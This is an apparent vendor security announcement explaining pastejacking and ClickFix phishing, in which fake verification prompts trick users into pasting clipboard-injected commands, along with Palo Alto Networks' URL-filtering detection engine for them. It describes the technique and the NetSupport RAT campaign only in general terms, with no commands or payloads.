As social engineering tactics become more sophisticated, threat actors are increasingly leveraging user-driven execution models. Palo Alto Networks has implemented detection capabilities for Pastejacking phishing attacks, a category of threats that weaponize the user’s clipboard to bypass traditional security perimeters.

Understanding Pastejacking

Pastejacking is a technique in which a malicious website hijacks a user's clipboard. When a user interacts with a page, such as by clicking a "Verify you are human" button or a fake "Fix It" prompt, malicious JavaScript replaces the clipboard content with a harmful command.

ClickFix is a specific campaign strategy that utilizes this technique. It masquerades as a technical support prompt, instructing the user to "fix" a common computer issue (such as a missing driver or a browser error) by pressing Win+R, pasting the command (Ctrl+V), and hitting Enter. Because the command is executed manually through a trusted system shell such as PowerShell, it bypasses static analysis tools designed to detect malicious web pages, as these tools typically do not analyze the user's clipboard.

Targeted Industries and Trends

ClickFix has become an increasingly popular technique in 2025. These campaigns leverage the reputation of legitimate products and services to mask malicious activity. Based on recent observations, these attacks impact a broad spectrum of global industries, including:

• High Technology
• Financial Services
• Manufacturing & Utilities
• Wholesale and Retail
• State and Local Government
• Professional and Legal Services

The rise of these tactics marks a significant shift toward lures that require manual user interaction to succeed.

Pastejacking Attack Examples

NetSupport RAT: Attackers utilize fake landing pages for services such as DocuSign or Okta. A "security verification" prompt instructs the user to execute a command, which sideloads a malicious DLL (msvcp140.dll) to eventually deploy the NetSupport Remote Access Trojan.

Detection via Advanced URL Filtering

Palo Alto Networks Advanced URL Filtering (AURL) has introduced a specialized Pastejacking Detection Engine designed to identify and block these hidden clipboard injection attacks. Static analyzers often fail because they do not analyze the clipboard or require manual user interaction to trigger the malicious payload. Our solution addresses these gaps through several key technical pillars:

• Dynamic Data Flow Analysis: The process begins by monitoring the system clipboard and input streams. The engine traces data flow to isolate hidden or obfuscated payloads the moment they are injected into the system. 
• Dynamic Deobfuscation: Once a suspicious payload is captured, it is passed to our patented Deobfuscation engine. This layer neutralizes evasion tactics and strips away the obfuscation to expose the raw, underlying code. 
• Deep Learning Analysis: This exposed content is immediately analyzed by our Deep Learning model to precisely detect malicious intent and block the attack.

Additional Information

For more information, refer to the Unit 42 Research Blog. 

For a comprehensive understanding of URL Filtering Category Best Practices, please refer to the provided documentation.